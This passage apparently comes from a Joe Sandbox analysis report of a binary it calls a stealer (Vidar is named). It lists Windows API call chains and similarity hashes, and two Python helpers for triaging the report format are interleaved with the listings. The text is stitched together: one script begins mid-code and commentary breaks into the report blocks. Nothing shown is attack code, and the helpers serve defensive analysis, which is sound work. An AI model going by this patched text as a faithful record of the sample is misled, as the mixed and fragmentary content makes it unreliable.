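• lstrcmpiW.KERNEL32(00000002,cdecl,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B482EB
Strings
Memory Dump Source
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00B42394
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B423A6
• _wcslen.LIBCMT ref: 00B7616C
Memory Dump Source
"""

# One "• name.MODULE(args), ref: ADDR" line. CRT entries such as
# "_wcslen.LIBCMT ref: ADDR" carry no argument list, so the parens are optional.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
HEX_RE = re.compile(r"[0-9A-F]{8}")

# Window messages appearing in this report (Windows SDK values).
WINDOW_MESSAGES = {
    0x00B0: "EM_GETSEL",
    0x00C9: "EM_LINEFROMCHAR",
    0x1002: "LVM_GETIMAGELIST",  # LVM_FIRST (0x1000) + 2
    0x1060: "LVM_SETCOLUMNW",    # LVM_FIRST (0x1000) + 96
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address from "ref:"
    subcall_of: Optional[int]   # callee address when Joe lists it as a subcall


def parse_report(text: str) -> List[List[ApiCall]]:
    """Return one list of parsed calls per "APIs" header in the text."""
    records: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        header = line.strip()
        if header == "APIs":
            current = []
            records.append(current)
            continue
        if header in ("Strings", "Memory Dump Source"):
            current = None          # end of this record's API listing
            continue
        m = CALL_RE.match(line)
        if current is None or not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                               int(m["sub"], 16) if m["sub"] else None))
    return records


def base_name(api: str) -> str:
    """Drop the ANSI/Unicode suffix (lstrlenW -> lstrlen); CRT names unchanged."""
    if len(api) > 1 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api


def call_set(calls: List[ApiCall], include_subcalls: bool = False) -> List[str]:
    """Sorted, de-duplicated API names the function calls directly."""
    return sorted({base_name(c.name) for c in calls
                   if include_subcalls or c.subcall_of is None})


def literal_args(calls: List[ApiCall]) -> List[str]:
    """Arguments Joe resolved to a literal string rather than '?' or a hex value."""
    return [a for c in calls for a in c.args if a != "?" and not HEX_RE.fullmatch(a)]


def decode_messages(calls: List[ApiCall]) -> List[Tuple[int, str]]:
    """(call site, message name) for each SendMessageW with a numeric uMsg."""
    out: List[Tuple[int, str]] = []
    for c in calls:
        if base_name(c.name) == "SendMessage" and len(c.args) > 1 and HEX_RE.fullmatch(c.args[1]):
            msg = int(c.args[1], 16)
            out.append((c.ref, WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")))
    return out


if __name__ == "__main__":
    for i, rec in enumerate(parse_report(SAMPLE), 1):
        print(f"record {i}: apis={call_set(rec)} strings={literal_args(rec)} "
              f"messages={[(hex(r), n) for r, n in decode_messages(rec)]}")
```

Run against a full report export, `call_set` gives a per-function API fingerprint to pivot on across samples, `literal_args` surfaces the resolved strings without reading every argument list, and `decode_messages` turns the message numbers into control names so a reader can tell at a glance that the second record drives an Edit control rather than doing anything network- or file-related.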
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00AE1AF4
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00B231F9
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B23203
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B2320E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6fd1be02407e830f53880d1e2c49638b314b43e7d3a62966d60596e9ae05f99f
                                                                                                                                                                                                                                                                                    • Instruction ID: ef81bbf251365b99c69bed737665bdf597e03f7f93724d5b48e4ba016c28ee6a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fd1be02407e830f53880d1e2c49638b314b43e7d3a62966d60596e9ae05f99f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30114C32A01169EBDB10DFA4D946DFE77B8FF05391F100462E916E3140CB75BA91CBA1
APIs
• GetCurrentThreadId.KERNEL32 ref: 00B4EB14
• MessageBoxW.USER32(?,?,?,?), ref: 00B4EB47
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B4EB5D
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B4EB64
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 0fb6c0eaa33af3c8edb90d8e9994f276aaca831138794c839d2f4d13f92c5d76
• Instruction ID: 844ff7ba1cfb315ce8ca15899ca907a65fee02efc7a99740d12215bdd60e58ca
• Opcode Fuzzy Hash: 0fb6c0eaa33af3c8edb90d8e9994f276aaca831138794c839d2f4d13f92c5d76
• Instruction Fuzzy Hash: 1B11DB76900218BFD7019BA89C46A9E7FFDFF45360F144255F826F3290DAB4CA048761
APIs
• CreateThread.KERNEL32(00000000,?,00B0D369,00000000,00000004,00000000), ref: 00B0D588
• GetLastError.KERNEL32 ref: 00B0D594
• __dosmaperr.LIBCMT ref: 00B0D59B
• ResumeThread.KERNEL32(00000000), ref: 00B0D5B9
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
• Opcode ID: a4384dee88e493a86b05eadcb0cba39fe0ca7a795dac66a1bbf73c938e5fb321
• Instruction ID: d5789a6c4e8d844b862f1301edaf8331b9586d242e01e3e9e2b252d9234e80ef
• Opcode Fuzzy Hash: a4384dee88e493a86b05eadcb0cba39fe0ca7a795dac66a1bbf73c938e5fb321
• Instruction Fuzzy Hash: 3F01DE32504214BBCB206FE9EC09BAE7FA8EF81334F100399F929971E0DF718940C6A1
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE78B1
• GetStockObject.GDI32(00000011), ref: 00AE78C5
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE78CF
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 8b9d6c0cd7a9dff0b6bf7e53de13af9a294174c202d06694149d25bb0df8d0d7
• Instruction ID: 47bcfe81a12d6e8112f4b3d530fbd149a6431903da6a4fa55ed1b0dbcfa899e1
• Opcode Fuzzy Hash: 8b9d6c0cd7a9dff0b6bf7e53de13af9a294174c202d06694149d25bb0df8d0d7
• Instruction Fuzzy Hash: 4011AD72505188BFEF069F91DC58EEE7B69FF183A4F440116FA0852120DB319CA0EBA1
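Several of the API chains in this section are compiler runtime boilerplate rather than stealer logic: CreateThread with dwCreationFlags=4 (CREATE_SUSPENDED) followed by GetLastError, __dosmaperr and ResumeThread is how the MSVC UCRT implements _beginthreadex, and LoadLibraryExW with flags 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32) followed by GetLastError and a second LoadLibraryExW with flags 0 is the UCRT's own DLL-loading fallback. The script below is an added example for reading blocks in this format; it is not part of the Joe Sandbox report and not code from the analysed binary. It parses the report's bullet lines and tags the runtime chains so a triager can skip them. The tag names, the parser and the SAMPLE text are constructed for this example, the runtime matching rules are assumptions drawn from the public UCRT sources, and the four Windows constants used are documented values.

```python
"""Triage helper for Joe Sandbox "APIs" blocks like the ones listed above.
Added example, not Joe Sandbox or Vidar code: it parses the bullet format and
tags call chains that the MSVC/UCRT runtime emits in every C/C++ binary, so a
triager can skip them. Runtime patterns are assumptions drawn from the public
UCRT sources; SAMPLE is constructed from this section of the report."""
import re
from dataclasses import dataclass
from typing import List, Optional

CREATE_SUSPENDED = 0x4                 # documented Windows constants
LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800
DEFAULT_GUI_FONT = 17                  # GetStockObject(17)
WM_SETFONT = 0x30

# One bullet per call, e.g. "• CreateThread.KERNEL32(00000000,?), ref: 00B0D588"
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

@dataclass
class Call:
    name: str
    module: str
    args: List[Optional[int]]          # None where the report prints "?"
    ref: int

def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None

def parse_blocks(text: str) -> List[List[Call]]:
    """Split the listing into per-function blocks ("APIs" .. "Memory Dump Source")."""
    blocks: List[List[Call]] = []
    current: List[Call] = []
    inside = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            inside, current = True, []
        elif line == "Memory Dump Source":
            if inside:
                blocks.append(current)
            inside = False
        elif inside and (m := CALL_RE.match(line)):
            args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
            current.append(Call(m["name"], m["module"], args, int(m["ref"], 16)))
    return blocks

def _arg_at(block: List[Call], call_idx: int, arg_idx: int) -> Optional[int]:
    args = block[call_idx].args
    return args[arg_idx] if arg_idx < len(args) else None

def classify(block: List[Call]) -> str:
    names = [c.name for c in block]
    # UCRT _beginthreadex: CreateThread(CREATE_SUSPENDED), errno mapping, ResumeThread.
    if names == ["CreateThread", "GetLastError", "__dosmaperr", "ResumeThread"] \
            and (_arg_at(block, 0, 4) or 0) & CREATE_SUSPENDED:
        return "crt:_beginthreadex"
    # UCRT DLL loading: LOAD_LIBRARY_SEARCH_SYSTEM32 first, plain retry after
    # GetLastError (the runtime tests for ERROR_INVALID_PARAMETER; the report shows
    # no value, so only the call order is checked here).
    ll = [i for i, n in enumerate(names) if n == "LoadLibraryExW"]
    if len(ll) == 2 and _arg_at(block, ll[0], 2) == LOAD_LIBRARY_SEARCH_SYSTEM32 \
            and _arg_at(block, ll[1], 2) == 0 and "GetLastError" in names[ll[0]:ll[1]]:
        return "crt:LoadLibraryExW-system32-fallback"
    # Ordinary GUI setup: a new control is handed DEFAULT_GUI_FONT via WM_SETFONT.
    if "GetStockObject" in names and "SendMessageW" in names:
        gso, msg = block[names.index("GetStockObject")], block[names.index("SendMessageW")]
        if gso.args[:1] == [DEFAULT_GUI_FONT] and len(msg.args) > 1 and msg.args[1] == WM_SETFONT:
            return "ui:WM_SETFONT-default-gui-font"
    return "unclassified"

def triage(text: str) -> List[str]:
    """Tag every block; the 'unclassified' ones are where analyst time should go."""
    return [classify(b) for b in parse_blocks(text)]

# Constructed sample: three blocks in the report's own bullet format.
SAMPLE = """\
APIs
• CreateThread.KERNEL32(00000000,?,00B0D369,00000000,00000004,00000000), ref: 00B0D588
• GetLastError.KERNEL32 ref: 00B0D594
• __dosmaperr.LIBCMT ref: 00B0D59B
• ResumeThread.KERNEL32(00000000), ref: 00B0D5B9
Memory Dump Source
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE78B1
• GetStockObject.GDI32(00000011), ref: 00AE78C5
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE78CF
Memory Dump Source
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364), ref: 00B13418
• GetLastError.KERNEL32(?,00B1338D), ref: 00B13424
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?), ref: 00B13432
Memory Dump Source
"""

if __name__ == "__main__":
    for tag, block in zip(triage(SAMPLE), parse_blocks(SAMPLE)):
        print(f"{block[0].ref:08X}  {tag}")
```

Run it directly and it prints one tag per block, keyed by the address of the block's first call. Anything tagged unclassified (the MessageBoxW/WaitForSingleObject chain above, for instance) is what still needs a human look. The runtime rules deliberately check only call order and flag values, because the report shows arguments but not the GetLastError result the real UCRT tests before retrying.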
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00B1338D,00000364,00000000,00000000,00000000,?,00B135FE,00000006,FlsSetValue), ref: 00B13418
• GetLastError.KERNEL32(?,00B1338D,00000364,00000000,00000000,00000000,?,00B135FE,00000006,FlsSetValue,00B83260,FlsSetValue,00000000,00000364,?,00B131B9), ref: 00B13424
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B1338D,00000364,00000000,00000000,00000000,?,00B135FE,00000006,FlsSetValue,00B83260,FlsSetValue,00000000), ref: 00B13432
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c50d11feebccec16051ffb941881a0fa0529e815cb1a698d6f247e90325025e6
                                                                                                                                                                                                                                                                                    • Instruction ID: 5cd38d227a1fec0899574f4a450e652d90489f68241158d4b4f6e5edb63c9903
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c50d11feebccec16051ffb941881a0fa0529e815cb1a698d6f247e90325025e6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F401A0326112229BCB324B79DC449D677E8FF05FB17910660F909E7341EB20DD81C6D4
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B4B69A,?,00008000), ref: 00B4BA8B
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4B69A,?,00008000), ref: 00B4BAB0
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B4B69A,?,00008000), ref: 00B4BABA
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4B69A,?,00008000), ref: 00B4BAED
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 9f79066df90d77f9b357fe97c49e2bcb020295aa42733f508db7f9ccecf58db3
• Instruction ID: d900f5aa9c6d3b3c23b0dc265590f8d13061587b46aa386d294211cab6663e82
• Opcode Fuzzy Hash: 9f79066df90d77f9b357fe97c49e2bcb020295aa42733f508db7f9ccecf58db3
• Instruction Fuzzy Hash: 9C113931C00A29EBCF009FA5E989AEEBBB8FF09711F504195DA41B3140CF309650EBA5
APIs
• GetWindowRect.USER32(?,?), ref: 00B7888E
• ScreenToClient.USER32(?,?), ref: 00B788A6
• ScreenToClient.USER32(?,?), ref: 00B788CA
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B788E5
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 931371feaa1cb61cee3d0c1331523d304464507444b78052068ed24d2a213688
• Instruction ID: c8a46db2b17bfe6a5733d48bdae06dfb0abb16262a2360173381558918c09fc7
• Opcode Fuzzy Hash: 931371feaa1cb61cee3d0c1331523d304464507444b78052068ed24d2a213688
• Instruction Fuzzy Hash: D91143B9D00209AFDB41CF98C884AEEBBF5FF08310F508156E919E3210D735AA94CF51
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B43712
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00B43723
• GetCurrentThreadId.KERNEL32 ref: 00B4372A
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B43731
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 369da8a792fc22026cb0806e5b427d51efe1be2a3bbdc09c9781ae59be8ba6e8
• Instruction ID: 6d83dd97d4d392aa598ab4cb0da94eb02a999b9e9c2d5303e530a5234a591d9c
• Opcode Fuzzy Hash: 369da8a792fc22026cb0806e5b427d51efe1be2a3bbdc09c9781ae59be8ba6e8
• Instruction Fuzzy Hash: A2E0EDB1601224BADA2057A29C8DEEB7FACDF56FE1F540055F50AE2090DEA4CA80D6B1
APIs
  • Part of subcall function 00AE1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE1F87
  • Part of subcall function 00AE1F2D: SelectObject.GDI32(?,00000000), ref: 00AE1F96
  • Part of subcall function 00AE1F2D: BeginPath.GDI32(?), ref: 00AE1FAD
  • Part of subcall function 00AE1F2D: SelectObject.GDI32(?,00000000), ref: 00AE1FD6
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B792E3
• LineTo.GDI32(?,?,?), ref: 00B792F0
• EndPath.GDI32(?), ref: 00B79300
• StrokePath.GDI32(?), ref: 00B7930E
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
APIs
• GetSysColor.USER32(00000008), ref: 00AE21BC
• SetTextColor.GDI32(?,?), ref: 00AE21C6
• SetBkMode.GDI32(?,00000001), ref: 00AE21D9
• GetStockObject.GDI32(00000005), ref: 00AE21E1
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
APIs
• GetDesktopWindow.USER32 ref: 00B3EC36
• GetDC.USER32(00000000), ref: 00B3EC40
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B3EC60
• ReleaseDC.USER32(?), ref: 00B3EC81
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 00B3EC4A
• GetDC.USER32(00000000), ref: 00B3EC54
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B3EC60
• ReleaseDC.USER32(?), ref: 00B3EC81
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
  • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B55919
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00B0E67D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: 716185ef836ba3bd3e0dbc1dd402446f5ac5c452832da2d60476d2997bb77b04
